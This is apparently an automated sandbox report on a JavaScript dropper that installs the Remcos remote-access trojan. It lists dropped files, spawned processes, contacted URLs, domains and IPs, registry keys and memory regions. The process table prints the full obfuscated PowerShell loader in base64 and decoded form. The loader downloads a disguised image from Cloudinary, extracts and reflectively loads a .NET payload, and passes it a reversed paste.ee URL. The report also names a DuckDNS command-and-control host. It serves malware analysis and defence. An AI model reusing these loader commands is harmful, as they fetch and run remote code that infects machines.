Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
NewOrder12052024.js
|
Unicode text, UTF-16, little-endian text, with very long lines (479), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\octaves.js
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\8Mvet[1].txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdwmd3el.n0q.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ekadcubq.u5d.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ijah4sag.mzc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oct2t54n.jun.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NewOrder12052024.js"
|
|
|
|
C:\Windows\System32\cscript.exe
|
"C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Local\Temp\octaves.js
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $lyophilizers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABwAG8AcwBzAGUAcwBzAGkAdgBlAG4AZQBzAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABwAHIAZQBvAGMAYwB1AHAAaQBlAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwBhAGQAYQB2AGUAcgBpAG4AZQBzACAAPQAgACQAcAByAGUAbwBjAGMAdQBwAGkAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHAAbwBzAHMAZQBzAHMAaQB2AGUAbgBlAHMAcwApADsAJABuAHkAbQBwAGgAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGMAYQBkAGEAdgBlAHIAaQBuAGUAcwApADsAJABsAGUAeABpAGMAYQBsAGkAegBlAHMAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgB2AG8AeQBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAbABpAHAAZAByAGUAcwBzACAAPQAgACQAbgB5AG0AcABoAHMALgBJAG4AZABlAHgATwBmACgAJABsAGUAeABpAGMAYQBsAGkAegBlAHMAKQA7ACQAdABoAHIAdQBzAGgAZQBzACAAPQAgACQAbgB5AG0AcABoAHMALgBJAG4AZABlAHgATwBmACgAJABlAG4AdgBvAHkAcwApADsAJABzAGwAaQBwAGQAcgBlAHMAcwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAHQAaAByAHUAcwBoAGUAcwAgAC0AZwB0ACAAJABzAGwAaQBwAGQAcgBlAHMAcwA7ACQAcwBsAGkAcABkAHIAZQBzAHMAIAArAD0AIAAkAGwAZQB4AGkAYwBhAGwAaQB6AGUAcwAuAEwAZQBuAGcAdABoADsAJABmAGUAcgBtAGkAbwBuAHMAIAA9ACAAJAB0AGgAcgB1AHMAaABlAHMAIAAtACAAJABzAGwAaQBwAGQAcgBlAHMAcwA7ACQAZAByAGUAYQBtAGkAZQByACAAPQAgACQAbgB5AG0AcABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwBsAGkAcABkAHIAZQBzAHMALAAgACQAZgBlAHIAbQBpAG8AbgBzACkAOwAkAG8AcgBnAGEAbgBpAHoAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAJABkAHIAZQBhAG0AaQBlAHIALgBUAG8AQwBoAGEAcgBBAHIAcgBhAHkAKAApACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8AIAB9ACkAWwAtADEALgAuAC0AKAAkAGQAcgBlAGEAbQBpAGUAcgAuAEwAZQBuAGcAdABoACkAXQA7ACQAcgBlAGIAYQB0AG8AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGcAYQBuAGkAegBlAGQAKQA7ACQAZQB0AHkAbQBvAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAcgBlAGIAYQB0AG8AKQA7ACQAZQBwAGkAZABvAHQAZQAgAD0AIABbAGQAbgBsAGkAYgAuAEkATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkAOwAkAGUAcABpAGQAbwB0AGUALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAQAAoACcAMAAvAFgAbwBSAGUAUAAvAHIALwBlAGUALgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoACcALAAgACcAawBhAGYAdABhAG4AJwAsACAAJwBrAGEAZgB0AGEAbgAnACwAIAAnAGsAYQBmAHQAYQBuACcALAAgACcATQBTAEIAdQBpAGwAZAAnACwAIAAnAGsAYQBmAHQAYQBuACcALAAgACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAawBhAGYAdABhAG4AJwAsACcAMQAnACwAJwBrAGEAZgB0AGEAbgAnACkAKQA7AGkAZgAgACgAJABuAHUAbABsACAALQBuAGUAIAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAgAC0AYQBuAGQAIAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABbAHYAbwBpAGQAXQAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAAfQAgAGUAbABzAGUAIAB7ACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAnAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2AGUAcgBzAGkAbwBuACAATgBvAHQAIABhAHYAYQBpAGwAYQBiAGwAZQAnACAAfQA7AGkAZgAgACgAJABuAHUAbABsACAALQBuAGUAIAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAgAC0AYQBuAGQAIAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABbAHYAbwBpAGQAXQAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAAfQAgAGUAbABzAGUAIAB7ACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAnAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2AGUAcgBzAGkAbwBuACAATgBvAHQAIABhAHYAYQBpAGwAYQBiAGwAZQAnACAAfQA7AA==';$atones
= [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($lyophilizers));powershell.exe -windowstyle
hidden -executionpolicy bypass -NoProfile -command $atones
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output
'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion
} else { Write-Output 'PowerShell version Not available' };$possessiveness = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
';$preoccupies = New-Object System.Net.WebClient;$cadaverines = $preoccupies.DownloadData($possessiveness);$nymphs = [System.Text.Encoding]::UTF8.GetString($cadaverines);$lexicalizes
= '<<BASE64_START>>';$envoys = '<<BASE64_END>>';$slipdress = $nymphs.IndexOf($lexicalizes);$thrushes = $nymphs.IndexOf($envoys);$slipdress
-ge 0 -and $thrushes -gt $slipdress;$slipdress += $lexicalizes.Length;$fermions = $thrushes - $slipdress;$dreamier = $nymphs.Substring($slipdress,
$fermions);$organized = -join ($dreamier.ToCharArray() | ForEach-Object { $_ })[-1..-($dreamier.Length)];$rebato = [System.Convert]::FromBase64String($organized);$etymon
= [System.Reflection.Assembly]::Load($rebato);$epidote = [dnlib.IO.Home].GetMethod('VAI');$epidote.Invoke($null, @('0/XoReP/r/ee.etsap//:sptth',
'kaftan', 'kaftan', 'kaftan', 'MSBuild', 'kaftan', 'kaftan','kaftan','kaftan','kaftan','kaftan','kaftan','1','kaftan'));if
($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output
'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion
} else { Write-Output 'PowerShell version Not available' };"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jawa123.duckdns.org
|
|
||
|
http://geoplugin.net/json.gpf
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgX
|
unknown
|
||
|
http://geoplugin.net/json.gp)
|
unknown
|
||
|
http://geoplugin.net/json.gp3c
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://paste.ee/d/8Mvet
|
172.67.187.200
|
||
|
https://paste.ee/r/PeRoX/0
|
172.67.187.200
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://paste.ee/d/8Mvet8
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.google.com
|
unknown
|
||
|
https://res.cloudinary.com
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://paste.ee/
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
|
unknown
|
There are 17 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jawa123.duckdns.org
|
154.216.20.244
|
|
|
|
paste.ee
|
172.67.187.200
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
res.cloudinary.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
154.216.20.244
|
jawa123.duckdns.org
|
Seychelles
|
|
|
|
172.67.187.200
|
paste.ee
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\cscript.exe
|
JScriptSetScriptStateStarted
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\net-YA1YXM
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\net-YA1YXM
|
licence
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
FB5000
|
heap
|
page read and write
|
|
|
|
2BFF000
|
stack
|
page read and write
|
|
|
|
F68000
|
heap
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
246C0337000
|
heap
|
page read and write
|
||
|
246C0326000
|
heap
|
page read and write
|
||
|
246C019B000
|
heap
|
page read and write
|
||
|
246C05E6000
|
heap
|
page read and write
|
||
|
7FFB49F90000
|
trusted library allocation
|
page read and write
|
||
|
246C0330000
|
heap
|
page read and write
|
||
|
22BCDFD6000
|
heap
|
page read and write
|
||
|
295001D1000
|
trusted library allocation
|
page read and write
|
||
|
22BCD804000
|
heap
|
page read and write
|
||
|
7FFB49E30000
|
trusted library allocation
|
page execute and read and write
|
||
|
246C0659000
|
heap
|
page read and write
|
||
|
246C01F3000
|
heap
|
page read and write
|
||
|
246BE3C9000
|
heap
|
page read and write
|
||
|
23C4EFC000
|
stack
|
page read and write
|
||
|
246BE2F0000
|
heap
|
page read and write
|
||
|
A5D367E000
|
stack
|
page read and write
|
||
|
246BE2FA000
|
heap
|
page read and write
|
||
|
295005A8000
|
trusted library allocation
|
page read and write
|
||
|
35FD000
|
stack
|
page read and write
|
||
|
7FFB49E90000
|
trusted library allocation
|
page read and write
|
||
|
29502DBC000
|
trusted library allocation
|
page read and write
|
||
|
A5D3BFE000
|
stack
|
page read and write
|
||
|
3AFB000
|
stack
|
page read and write
|
||
|
246C02FD000
|
heap
|
page read and write
|
||
|
13380069000
|
trusted library allocation
|
page read and write
|
||
|
133E98F0000
|
trusted library allocation
|
page read and write
|
||
|
22BCBA45000
|
heap
|
page read and write
|
||
|
246C0657000
|
heap
|
page read and write
|
||
|
29500050000
|
heap
|
page readonly
|
||
|
13380096000
|
trusted library allocation
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
246C033E000
|
heap
|
page read and write
|
||
|
246C014C000
|
heap
|
page read and write
|
||
|
246BE422000
|
heap
|
page read and write
|
||
|
246C032F000
|
heap
|
page read and write
|
||
|
246C0156000
|
heap
|
page read and write
|
||
|
2AF0000
|
heap
|
page read and write
|
||
|
22BCB9B6000
|
heap
|
page read and write
|
||
|
246C05DC000
|
heap
|
page read and write
|
||
|
22BCDFD5000
|
heap
|
page read and write
|
||
|
246BE290000
|
heap
|
page read and write
|
||
|
22BCDFFE000
|
heap
|
page read and write
|
||
|
FB3000
|
heap
|
page read and write
|
||
|
246C0683000
|
heap
|
page read and write
|
||
|
246C0320000
|
heap
|
page read and write
|
||
|
246C01D4000
|
heap
|
page read and write
|
||
|
133E9900000
|
heap
|
page readonly
|
||
|
246C031F000
|
heap
|
page read and write
|
||
|
22BCD808000
|
heap
|
page read and write
|
||
|
246BE420000
|
heap
|
page read and write
|
||
|
246C031F000
|
heap
|
page read and write
|
||
|
7FFB49D26000
|
trusted library allocation
|
page read and write
|
||
|
133EA1D0000
|
heap
|
page read and write
|
||
|
F60000
|
heap
|
page read and write
|
||
|
CDDA8FF000
|
stack
|
page read and write
|
||
|
22BCBB10000
|
heap
|
page read and write
|
||
|
22BCB8E0000
|
heap
|
page read and write
|
||
|
22BCE0CE000
|
heap
|
page read and write
|
||
|
246C0130000
|
heap
|
page read and write
|
||
|
22BCBB4B000
|
heap
|
page read and write
|
||
|
133E8059000
|
heap
|
page read and write
|
||
|
246BE420000
|
heap
|
page read and write
|
||
|
29500040000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49C80000
|
trusted library allocation
|
page read and write
|
||
|
22BCD460000
|
heap
|
page read and write
|
||
|
29500020000
|
trusted library allocation
|
page read and write
|
||
|
246C0634000
|
heap
|
page read and write
|
||
|
246C01A4000
|
heap
|
page read and write
|
||
|
246C0661000
|
heap
|
page read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
133E9EE9000
|
heap
|
page read and write
|
||
|
22BCBB20000
|
heap
|
page read and write
|
||
|
22BCB9EC000
|
heap
|
page read and write
|
||
|
246C01E8000
|
heap
|
page read and write
|
||
|
246C0683000
|
heap
|
page read and write
|
||
|
246C05EC000
|
heap
|
page read and write
|
||
|
246C061F000
|
heap
|
page read and write
|
||
|
295037BC000
|
trusted library allocation
|
page read and write
|
||
|
22BCE0CE000
|
heap
|
page read and write
|
||
|
246C05E8000
|
heap
|
page read and write
|
||
|
FA7000
|
heap
|
page read and write
|
||
|
1338004F000
|
trusted library allocation
|
page read and write
|
||
|
295001C0000
|
heap
|
page execute and read and write
|
||
|
133EA1E8000
|
heap
|
page read and write
|
||
|
246C05F0000
|
heap
|
page read and write
|
||
|
7FFB49D30000
|
trusted library allocation
|
page execute and read and write
|
||
|
246C0630000
|
heap
|
page read and write
|
||
|
246C0146000
|
heap
|
page read and write
|
||
|
22BCB7E0000
|
heap
|
page read and write
|
||
|
7FFB49EF0000
|
trusted library allocation
|
page read and write
|
||
|
22BCB9D1000
|
heap
|
page read and write
|
||
|
246C0152000
|
heap
|
page read and write
|
||
|
13380415000
|
trusted library allocation
|
page read and write
|
||
|
22BCE0BC000
|
heap
|
page read and write
|
||
|
BBCFD27000
|
stack
|
page read and write
|
||
|
F1E000
|
stack
|
page read and write
|
||
|
133E9ED0000
|
heap
|
page read and write
|
||
|
13380446000
|
trusted library allocation
|
page read and write
|
||
|
246C0148000
|
heap
|
page read and write
|
||
|
246C0306000
|
heap
|
page read and write
|
||
|
22BCB990000
|
heap
|
page read and write
|
||
|
246C032D000
|
heap
|
page read and write
|
||
|
1338012A000
|
trusted library allocation
|
page read and write
|
||
|
246C014F000
|
heap
|
page read and write
|
||
|
246C064E000
|
heap
|
page read and write
|
||
|
22BCE0AA000
|
heap
|
page read and write
|
||
|
BBD06FE000
|
stack
|
page read and write
|
||
|
246BE2C0000
|
heap
|
page read and write
|
||
|
475000
|
remote allocation
|
page execute and read and write
|
||
|
22BCBA03000
|
heap
|
page read and write
|
||
|
22BCBA36000
|
heap
|
page read and write
|
||
|
471000
|
remote allocation
|
page execute and read and write
|
||
|
22BCE1F7000
|
heap
|
page read and write
|
||
|
13380429000
|
trusted library allocation
|
page read and write
|
||
|
133E9A45000
|
heap
|
page read and write
|
||
|
22BCDFD0000
|
heap
|
page read and write
|
||
|
246C02F9000
|
heap
|
page read and write
|
||
|
22BCBA32000
|
heap
|
page read and write
|
||
|
22BCD7F5000
|
heap
|
page read and write
|
||
|
295005B0000
|
trusted library allocation
|
page read and write
|
||
|
133E9A40000
|
heap
|
page read and write
|
||
|
246C05D8000
|
heap
|
page read and write
|
||
|
22BCE000000
|
heap
|
page read and write
|
||
|
246BE351000
|
heap
|
page read and write
|
||
|
246C030F000
|
heap
|
page read and write
|
||
|
7FFB49EE0000
|
trusted library allocation
|
page read and write
|
||
|
A5D38F8000
|
stack
|
page read and write
|
||
|
CDDABFE000
|
stack
|
page read and write
|
||
|
246C015C000
|
heap
|
page read and write
|
||
|
133E99C7000
|
heap
|
page execute and read and write
|
||
|
295069BC000
|
trusted library allocation
|
page read and write
|
||
|
246C01D8000
|
heap
|
page read and write
|
||
|
35BF000
|
stack
|
page read and write
|
||
|
246BE35C000
|
heap
|
page read and write
|
||
|
22BCD7F3000
|
heap
|
page read and write
|
||
|
246C0323000
|
heap
|
page read and write
|
||
|
246BE34C000
|
heap
|
page read and write
|
||
|
133E804B000
|
heap
|
page read and write
|
||
|
7FFB49F60000
|
trusted library allocation
|
page read and write
|
||
|
246C031B000
|
heap
|
page read and write
|
||
|
295005BC000
|
trusted library allocation
|
page read and write
|
||
|
246C0614000
|
heap
|
page read and write
|
||
|
246C0624000
|
heap
|
page read and write
|
||
|
246C0148000
|
heap
|
page read and write
|
||
|
246C0311000
|
heap
|
page read and write
|
||
|
133E7EB0000
|
heap
|
page read and write
|
||
|
133E7FBA000
|
heap
|
page read and write
|
||
|
1338058E000
|
trusted library allocation
|
page read and write
|
||
|
29500177000
|
heap
|
page execute and read and write
|
||
|
246BE2FA000
|
heap
|
page read and write
|
||
|
246C033E000
|
heap
|
page read and write
|
||
|
133EA0C0000
|
heap
|
page execute and read and write
|
||
|
22BCBA01000
|
heap
|
page read and write
|
||
|
246C05D6000
|
heap
|
page read and write
|
||
|
246C0609000
|
heap
|
page read and write
|
||
|
7DF437AC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
246C0318000
|
heap
|
page read and write
|
||
|
246C0683000
|
heap
|
page read and write
|
||
|
22BCBA32000
|
heap
|
page read and write
|
||
|
246BE41A000
|
heap
|
page read and write
|
||
|
246C02EC000
|
heap
|
page read and write
|
||
|
FD8000
|
heap
|
page read and write
|
||
|
246BE35A000
|
heap
|
page read and write
|
||
|
23C507F000
|
stack
|
page read and write
|
||
|
246C062B000
|
heap
|
page read and write
|
||
|
22BCBA3C000
|
heap
|
page read and write
|
||
|
133E7F20000
|
heap
|
page read and write
|
||
|
BBD08FE000
|
stack
|
page read and write
|
||
|
36FE000
|
stack
|
page read and write
|
||
|
246C0301000
|
heap
|
page read and write
|
||
|
2A3C000
|
stack
|
page read and write
|
||
|
22BCE0D0000
|
heap
|
page read and write
|
||
|
22BCE004000
|
heap
|
page read and write
|
||
|
22BCD490000
|
heap
|
page read and write
|
||
|
246C0301000
|
heap
|
page read and write
|
||
|
9CC000
|
stack
|
page read and write
|
||
|
22BCE0CE000
|
heap
|
page read and write
|
||
|
22BCB9B5000
|
heap
|
page read and write
|
||
|
2CFF000
|
stack
|
page read and write
|
||
|
22BCD7F0000
|
heap
|
page read and write
|
||
|
246BE2F5000
|
heap
|
page read and write
|
||
|
246C0174000
|
heap
|
page read and write
|
||
|
7FFB49C7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
246C033E000
|
heap
|
page read and write
|
||
|
13390010000
|
trusted library allocation
|
page read and write
|
||
|
A5D36FD000
|
stack
|
page read and write
|
||
|
1338050B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49D56000
|
trusted library allocation
|
page execute and read and write
|
||
|
246BE35B000
|
heap
|
page read and write
|
||
|
246C0318000
|
heap
|
page read and write
|
||
|
22BCE0CE000
|
heap
|
page read and write
|
||
|
246C0138000
|
heap
|
page read and write
|
||
|
A5D3A7C000
|
stack
|
page read and write
|
||
|
246C0136000
|
heap
|
page read and write
|
||
|
22BCE0CE000
|
heap
|
page read and write
|
||
|
29500251000
|
trusted library allocation
|
page read and write
|
||
|
22BCDFFE000
|
heap
|
page read and write
|
||
|
22BCBA32000
|
heap
|
page read and write
|
||
|
34BE000
|
stack
|
page read and write
|
||
|
246C02B7000
|
heap
|
page read and write
|
||
|
246C014F000
|
heap
|
page read and write
|
||
|
22BCE0CE000
|
heap
|
page read and write
|
||
|
23C537E000
|
stack
|
page read and write
|
||
|
246C0602000
|
heap
|
page read and write
|
||
|
246C032F000
|
heap
|
page read and write
|
||
|
246C0160000
|
heap
|
page read and write
|
||
|
246C05D8000
|
heap
|
page read and write
|
||
|
22BCB9BF000
|
heap
|
page read and write
|
||
|
1338054C000
|
trusted library allocation
|
page read and write
|
||
|
22BCDFFC000
|
heap
|
page read and write
|
||
|
246C033D000
|
heap
|
page read and write
|
||
|
246C01DA000
|
heap
|
page read and write
|
||
|
246C0301000
|
heap
|
page read and write
|
||
|
246C0323000
|
heap
|
page read and write
|
||
|
23C50FE000
|
stack
|
page read and write
|
||
|
7FFB49D2C000
|
trusted library allocation
|
page execute and read and write
|
||
|
A5D377F000
|
stack
|
page read and write
|
||
|
29507DBC000
|
trusted library allocation
|
page read and write
|
||
|
23C4F7F000
|
stack
|
page read and write
|
||
|
13380401000
|
trusted library allocation
|
page read and write
|
||
|
246C030B000
|
heap
|
page read and write
|
||
|
7FFB49F30000
|
trusted library allocation
|
page read and write
|
||
|
22BCD8F0000
|
remote allocation
|
page read and write
|
||
|
22BCBA01000
|
heap
|
page read and write
|
||
|
22BCBA29000
|
heap
|
page read and write
|
||
|
22BCB9EC000
|
heap
|
page read and write
|
||
|
246C05D0000
|
heap
|
page read and write
|
||
|
246C05D1000
|
heap
|
page read and write
|
||
|
246C013B000
|
heap
|
page read and write
|
||
|
246C0300000
|
heap
|
page read and write
|
||
|
